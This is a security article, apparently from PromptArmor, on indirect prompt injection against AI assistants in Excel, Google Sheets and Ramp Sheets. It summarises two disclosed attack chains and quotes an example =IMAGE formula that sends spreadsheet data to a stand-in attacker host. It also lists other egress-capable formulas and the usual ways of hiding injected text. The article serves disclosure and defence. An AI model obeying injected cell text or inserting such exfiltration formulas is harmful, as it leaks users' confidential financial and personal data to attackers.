AI in Excel and Google Sheets: Prompt Injection and Data Exfiltration Risks

Overview

Spreadsheets are the connective tissue of enterprise data: financial models, customer lists, vendor contracts, employee compensation, board materials. In the past two years, every major spreadsheet platform has shipped AI features, and a growing roster of third-party AI add-ons now runs alongside them: Claude for Excel, Microsoft Copilot in Excel, Google Gemini in Sheets, ChatGPT for Excel and Google Sheets, and standalone AI-native spreadsheet tools like Ramp Sheets are just a few that have hit the market.

PromptArmor has documented attack chains from deployed applications exfiltrating sensitive data through these features:

• CellShock: Claude AI is Excel-lent at Stealing Data — an indirect prompt injection hidden in an imported reference dataset coerces Claude for Excel into inserting an =IMAGE("https://attacker/...?data=" & summarized_financials) formula and exfiltrating the victim's confidential financial model.

• Ramp's Sheets AI Exfiltrates Financials — a near-identical attack against Ramp's AI-native spreadsheet, executed with no human-in-the-loop approval at all. Disclosed February 2026, resolved by Ramp on March 16, 2026.

The pattern is consistent across vendors and platforms — Anthropic, Ramp, OpenAI, Microsoft, Google — AI in spreadsheets is a novel class of prompt injection risk surface. This article maps that category and references the relevant OWASP risks (LLM01:2025 Prompt Injection from the OWASP Top 10 for LLM Applications 2025, and the OWASP Top 10 for Agentic Applications 2026).

The Threat Model

The root risk is indirect prompt injection — LLM01:2025 in the OWASP Top 10, amplified for agentic systems in the Agentic Top 10 — landing on a uniquely permissive attack surface.

Why spreadsheets are a uniquely dangerous host for AI

Three properties of spreadsheets compound prompt injection risk in ways most other AI integrations don't share.

1. Cell content arrives from untrusted upstream sources by default. Spreadsheets are designed to consume data from external places — imported CSVs, copy-pasted web ranges, exported reports from third-party SaaS, vendor-supplied templates, rows added via integrations and webhooks. Any AI feature that reads cell content treats all of this as part of the prompt, including content no human reviewer ever read closely.

2. AI features in spreadsheets take actions. They write formulas, modify ranges, generate scripts (Office Scripts, Apps Script), build pivots, and can even render images. The space of actions an injected agent can take inside a spreadsheet is wide — and several of those actions trigger external network requests by design.

3. Human-in-the-loop is often absent or too coarse to matter. When an AI inserts =IMAGE("https://attacker/exfil?data=" & SUMMARY(A1:Z100)), the user typically sees an "approve cell edit" prompt without the formula visible — or no prompt at all. Ramp's Sheets AI inserted formulas with no approval gate, and GPT for Excel and Sheets uses one-per-session edit approval that enables multiple future edits; Claude for Excel's first beta showed an "Add visualization" approval that hid the malicious URL until Anthropic improved the interstitial post-disclosure.

Likely sources of untrusted data

The common patterns we see in active investigations:

• Imported reference datasets (industry benchmarks, market data, competitor pricing) copy-pasted from web sources or shared drives — the vector in both the CellShock and Ramp attack chains

• Exported tables from internal SaaS (CRMs, ticketing, HRIS) where source apps allow free-text fields editable by vendors, customers, partners, or candidates

• Email-to-row integrations that turn inbound emails into spreadsheet rows

• Scraped content via IMPORTHTML, IMPORTXML, paste-special, or Apps Script

• Vendor-supplied templates (RFP responses, due-diligence questionnaires) opened directly in the user's environment

Hidden text — white-on-white, one-pixel font, content concealed in unused columns — is the standard concealment technique and is what was used in both documented attack chains.

Actions an injected agent can take

Once injection lands, the high-impact action surface clusters into three areas:

• Insert egress-capable formulas: =IMAGE(URL) (loads from URL), =WEBSERVICE(URL) (Excel), =IMPORTDATA(URL) / =IMPORTXML(URL) (Sheets), =HYPERLINK(URL,label) (becomes click-through), and Apps Script-resolvable custom functions. Combined with concatenated cell data, any of these is an exfiltration channel.

• Write or modify cells across the workbook. Sensitive data from one sheet can be aggregated into the formula payload of another sheet that the user is unlikely to inspect.

• Generate and run scripts. Office Scripts in Excel and Apps Script in Sheets execute with the user's identity, and in some cases can make API calls outside the document entirely. AI-generated Python in Excel (Advanced Analysis with Copilot) can be manipulated to programmatically aggregate data for exfiltration.

Malware in spreadsheets: old problem, new surface

Spreadsheets have been a malware delivery vehicle for decades. Macro viruses, embedded executables, malicious add-in installers, and exploit-laden XLL files have all turned opening a workbook into running attacker code. Defenders responded by hardening the file format itself: blocking macros from internet-sourced files, sensitivity labeling, Trust Center deployment of approved templates, Mark of the Web enforcement, and disabling unsigned add-ins by default. CISA's standing alert on macro-based malware frames the lineage bluntly: "Microsoft Office applications use macros to automate routine tasks. However, macros can contain malicious code that can be used to exploit vulnerable systems."

AI features in spreadsheets are the same risk class on a new substrate. The malicious payload no longer has to be code — it can be plain text in a cell, processed by an AI agent that then chooses to take a malicious action on the user's behalf. Prompt injection makes any cell containing untrusted text potentially executable. The blast radius is wider than macros (any cell, by anyone with edit access, at any time after the file was created), and the existing macro-era controls (Mark of the Web, Trust Center, IRM, signed-macro policies) do not apply because the dangerous content is just text. This is a novel category of risk surface, recognizable across multiple unrelated vendor implementations.

Leading AI in Spreadsheet Tools and How They Mitigate Risk